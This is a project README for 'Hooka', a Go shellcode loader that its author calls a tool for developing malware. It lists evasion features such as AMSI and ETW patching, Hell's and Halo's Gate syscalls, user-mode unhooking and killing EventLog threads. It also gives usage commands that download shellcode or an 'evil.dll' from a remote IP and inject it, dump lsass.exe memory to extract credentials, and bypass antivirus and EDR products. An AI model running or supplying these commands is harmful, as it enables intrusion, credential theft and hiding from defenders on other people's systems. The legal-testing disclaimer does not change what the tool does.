Introduction • Features • Usage • Library • Contributing • Disclaimer
I started this project to create a powerful shellcode loader with a lot of malleable capabilities via CLI flags like detecting hooked functions, using Hell's and Galo's Gate techniques and more. Why in Golang? Because it's a great language to develop malware and this project can help with it by providing an stable API with some functions which can be really useful. If you have any question feel free to open an issue or whatever you want.
However I've also taken some code from BananaPhone and Doge-Gabh projects (thanks a lot to C-Sto and timwhitez)
Tested on x64, Windows 10
-
Get shellcode from remote URL or local file
-
Shellcode reflective DLL injection (sRDI)
-
AMSI and ETW patch
-
Phant0m technique to kill EventLog threads (see here)
-
Detects hooked functions (i.e. NtCreateThread)
-
Compatible with base64 and hex encoded shellcode
-
Hell's Gate + Halo's Gate technique
-
Capable of unhooking user-mode syscalls via multiple techniques:
- Classic unhooking
- Full DLL unhooking
- Perun's Fart technique
-
Multiple shellcode injection techniques:
- CreateRemoteThread
- CreateProcess
- EnumSystemLocales
- Fibers
- QueueUserApc
- UuidFromString
- EtwpCreateEtwThread
- RtlCreateUserThread
-
Inject shellcode into a process (not stable and only works via CreateRemoteThread technique)
-
Dump lsass.exe process to a file
-
Windows API hashing (see here)
-
Test mode (injects calc.exe shellcode)
-
All already mentioned features available through official package API
This repo is under development so it may contain errors, use it under your own responsability for legal testing purposes
- Just clone the repository like this:
git clone https://github.com/D3Ext/Hooka
cd Hooka
makeBefore using the project you should know that there are some functions from ntdll.dll that aren't usually hooked but they always appear to be hooked. Here you have all false positives:
NtGetTickCount
NtQuerySystemTime
NtdllDefWindowProc_A
NtdllDefWindowProc_W
NtdllDialogWndProc_A
NtdllDialogWndProc_W
ZwQuerySystemTime
- Let's see some examples
Help panel
Detect hooked functions by EDR (including false positives)
.\Hooka.exe --hooksTest shellcode injection by spawning a calc.exe
.\Hooka.exe --testInject shellcode from URL or file
.\Hooka.exe --url http://192.168.116.37/shellcode.bin
.\Hooka.exe --file shellcode.binShellcode reflective dll injection (sRDI)
.\Hooka.exe --dll evil.dll,xyz
.\Hooka.exe --remote-dll http://192.168.1.37/evil.dll,xyzInject shellcode into remote process (i.e. werfault.exe) Not all techniques covered!!
.\Hooka.exe --url http://192.168.116.37/shellcode.bin --pid 5864Decode shellcode as hex or base64
.\Hooka.exe --file shellcode.bin --hex
.\Hooka.exe --file shellcode.bin --b64Use Hell's Gate + Halo's Gate to bypass AVs/EDRs
.\Hooka.exe -t CreateRemoteThreadHalos --url http://192.168.116.37/shellcode.binUnhook function before injecting shellcode
.\Hooka.exe --file shellcode.bin --unhook 3Patch AMSI and/or ETW
.\Hooka.exe --amsi --url http://192.168.116.37/shellcode.bin
.\Hooka.exe --etw --url http://192.168.116.37/shellcode.binKill EventLog service threads (run as admin)
.\Hooka.exe --phantomDump lsass.exe memory to extract credentials (run as admin)
.\Hooka.exe --lsass dump.tmpAs you can see Hooka provides a lot of CLI flags to help you in all kind of situations
Detecting hooks
Injecting shellcode via CreateRemoteThread technique
Injecting shellcode using custom flags
Test function
Dump lsass memory
☑️ Block other processes to open our process like BlockOpenHandle
☑️ Unhook patch (write bytes)
🔲 --pid flag to handle process injection
☑️ Function to find PIDs which haven't loaded a given DLL (i.e. umppc16606.dll)
🔲 Remove Windows Defender privileges to make it useless (see here)
🔲 Test unhooking functions against EDRs
To use the official package API see here and here
See CONTRIBUTING.md
You can take a look at some of the mentioned techniques here:
https://github.com/C-Sto/BananaPhone
https://github.com/timwhitez/Doge-Gabh
https://github.com/Ne0nd0g/go-shellcode
https://github.com/trickster0/TartarusGate
https://github.com/Kara-4search/HookDetection_CSharp
https://github.com/RedLectroid/APIunhooker
https://github.com/plackyhacker/Peruns-Fart
https://github.com/chvancooten/maldev-for-dummies
https://blog.sektor7.net/#!res/2021/perunsfart.md
https://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/
https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions#checking-for-hooks
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
https://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time
https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware
Creator has no responsibility for any kind of:
- Illegal use of the project.
- Law infringement by third parties and users.
- Malicious act, capable of causing damage to third parties, promoted by the user through this software.
See CHANGELOG.md
This project is under MIT license
Copyright © 2023, D3Ext
